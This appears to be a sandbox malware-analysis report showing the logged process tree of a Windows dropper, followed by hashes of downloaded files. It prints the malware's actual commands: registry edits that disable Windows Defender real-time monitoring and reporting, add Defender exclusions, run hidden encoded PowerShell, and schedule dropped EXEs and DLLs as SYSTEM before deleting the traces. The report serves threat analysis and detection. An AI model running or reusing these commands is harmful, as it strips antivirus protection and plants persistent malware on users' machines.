C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1244 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1908
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2000
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1600 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1888
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:436
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxnpOkBep" /SC once /ST 05:28:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxnpOkBep"4⤵PID:1968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxnpOkBep"4⤵PID:1352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bAwQExQPiZaafeCamU" /SC once /ST 07:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VODhvctqeHyJYwYFr\TxjOIIGxBbzvsmw\KzHFZKW.exe\" EF /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1276
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {76267A10-EC62-4AAD-AAD7-41D2AE59B463} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:1960
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:992
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:608
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1760
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:684 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1344
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1616
-
C:\Windows\system32\taskeng.exetaskeng.exe {205464DA-2F93-477C-8AE0-BED48AE3FE46} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1120
-
C:\Users\Admin\AppData\Local\Temp\VODhvctqeHyJYwYFr\TxjOIIGxBbzvsmw\KzHFZKW.exeC:\Users\Admin\AppData\Local\Temp\VODhvctqeHyJYwYFr\TxjOIIGxBbzvsmw\KzHFZKW.exe EF /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1896 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzBiFTecS" /SC once /ST 00:35:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzBiFTecS"3⤵PID:1340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzBiFTecS"3⤵PID:728
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1696
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:992
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1724
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggyPZVHoB" /SC once /ST 03:24:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggyPZVHoB"3⤵PID:636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggyPZVHoB"3⤵PID:2028
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TxHUzkpwYBplqcjW" /t REG_DWORD /d 0 /reg:323⤵PID:1516
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TxHUzkpwYBplqcjW" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TxHUzkpwYBplqcjW" /t REG_DWORD /d 0 /reg:643⤵PID:1680
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TxHUzkpwYBplqcjW" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TxHUzkpwYBplqcjW" /t REG_DWORD /d 0 /reg:323⤵PID:976
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TxHUzkpwYBplqcjW" /t REG_DWORD /d 0 /reg:324⤵PID:956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TxHUzkpwYBplqcjW" /t REG_DWORD /d 0 /reg:643⤵PID:1348
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TxHUzkpwYBplqcjW" /t REG_DWORD /d 0 /reg:644⤵PID:592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\TxHUzkpwYBplqcjW\poAqAZie\kFjUlnQkzuIJXNPj.wsf"3⤵PID:992
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\TxHUzkpwYBplqcjW\poAqAZie\kFjUlnQkzuIJXNPj.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1840 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JQAOeKcGDuNaDFbYOGR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JQAOeKcGDuNaDFbYOGR" /t REG_DWORD /d 0 /reg:644⤵PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UPpgYDaaU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UPpgYDaaU" /t REG_DWORD /d 0 /reg:644⤵PID:804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hrqGEdoywWohC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hrqGEdoywWohC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixeeJgwLjCKU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixeeJgwLjCKU2" /t REG_DWORD /d 0 /reg:644⤵PID:2016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wtSimwBHoNUn" /t REG_DWORD /d 0 /reg:324⤵PID:1728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wtSimwBHoNUn" /t REG_DWORD /d 0 /reg:644⤵PID:112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PZZtgzkizptCKcVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PZZtgzkizptCKcVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VODhvctqeHyJYwYFr" /t REG_DWORD /d 0 /reg:324⤵PID:1420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VODhvctqeHyJYwYFr" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TxHUzkpwYBplqcjW" /t REG_DWORD /d 0 /reg:324⤵PID:1352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TxHUzkpwYBplqcjW" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JQAOeKcGDuNaDFbYOGR" /t REG_DWORD /d 0 /reg:324⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JQAOeKcGDuNaDFbYOGR" /t REG_DWORD /d 0 /reg:644⤵PID:436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UPpgYDaaU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UPpgYDaaU" /t REG_DWORD /d 0 /reg:644⤵PID:1888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hrqGEdoywWohC" /t REG_DWORD /d 0 /reg:324⤵PID:772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hrqGEdoywWohC" /t REG_DWORD /d 0 /reg:644⤵PID:1924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixeeJgwLjCKU2" /t REG_DWORD /d 0 /reg:324⤵PID:1760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ixeeJgwLjCKU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wtSimwBHoNUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wtSimwBHoNUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PZZtgzkizptCKcVB" /t REG_DWORD /d 0 /reg:324⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PZZtgzkizptCKcVB" /t REG_DWORD /d 0 /reg:644⤵PID:276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VODhvctqeHyJYwYFr" /t REG_DWORD /d 0 /reg:324⤵PID:1724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VODhvctqeHyJYwYFr" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TxHUzkpwYBplqcjW" /t REG_DWORD /d 0 /reg:324⤵PID:332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TxHUzkpwYBplqcjW" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1352
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVDpLQsbZ" /SC once /ST 00:58:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVDpLQsbZ"3⤵PID:1208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVDpLQsbZ"3⤵PID:1768
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1272
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2020
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1112
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eGVBkLkPwgEdMrpNZ" /SC once /ST 03:08:46 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TxHUzkpwYBplqcjW\srriSlvyYZzpXJF\xZnOiNv.exe\" xd /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "eGVBkLkPwgEdMrpNZ"3⤵PID:1592
-
-
-
C:\Windows\Temp\TxHUzkpwYBplqcjW\srriSlvyYZzpXJF\xZnOiNv.exeC:\Windows\Temp\TxHUzkpwYBplqcjW\srriSlvyYZzpXJF\xZnOiNv.exe xd /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1620 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bAwQExQPiZaafeCamU"3⤵PID:696
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:332
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1352
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:584
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UPpgYDaaU\RKHVJs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "vQAvJIyZdbNJknC" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1672
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vQAvJIyZdbNJknC2" /F /xml "C:\Program Files (x86)\UPpgYDaaU\nkfwVzX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vQAvJIyZdbNJknC"3⤵PID:932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vQAvJIyZdbNJknC"3⤵PID:1760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XUsZsPqeLsALMb" /F /xml "C:\Program Files (x86)\ixeeJgwLjCKU2\BoQpgqd.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1648
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fGkOuzxnXhSQU2" /F /xml "C:\ProgramData\PZZtgzkizptCKcVB\QmZRtxY.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1924
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xPArhhGkLkOiZuUQj2" /F /xml "C:\Program Files (x86)\JQAOeKcGDuNaDFbYOGR\kbpUZfF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NZspzgPZKkseKlsqYsN2" /F /xml "C:\Program Files (x86)\hrqGEdoywWohC\QneYufr.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VsXBqhRBjzCeDtAuY" /SC once /ST 05:19:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\TxHUzkpwYBplqcjW\SKdLHjqv\KOhfEIx.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "VsXBqhRBjzCeDtAuY"3⤵PID:728
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:332
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1716
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:804
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eGVBkLkPwgEdMrpNZ"3⤵PID:1996
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TxHUzkpwYBplqcjW\SKdLHjqv\KOhfEIx.dll",#1 /site_id 5254032⤵PID:276
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TxHUzkpwYBplqcjW\SKdLHjqv\KOhfEIx.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1096 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VsXBqhRBjzCeDtAuY"4⤵PID:984
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1608
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:552
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1552
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5b46db973aaa948c909b055d876dc800a
SHA1cc63e361f28f8b5b520dee088cf84eb99b79d0c4
SHA256a275dae557c167771261b0e4498763a7b20bdbd7c57ebc5e6d37a391d2aa434d
SHA512721b4f543d30ffb8859f5b835ba02ac2c2c656c2e33fd019b0cf4ad12136fcaa1dd28d81588345b667306f6d387194e4ba92109c02694fced825a10c6933f72e
-
Filesize
2KB
MD51dfaf0d6f007863e708dd97dd779f024
SHA1c1cf87250dabf5088c915c59dba255fdb7e35cbd
SHA256de8486a5a59c940e938d549ed3603926dce74d1dd9045b937945892a930023d0
SHA512de789206e93026f4ef1ea45fece287466921488d6bb205b1b4d77f1ff8befc334f41134c4bf2c210d641e45c42106f77d20cae15e941a3c84ec989c703cea317
-
Filesize
2KB
MD5d18e99b98438fd44f73fcb55f597c89d
SHA1fd731952e1cc83cbfb5cf2815f01a8fd374bd55a
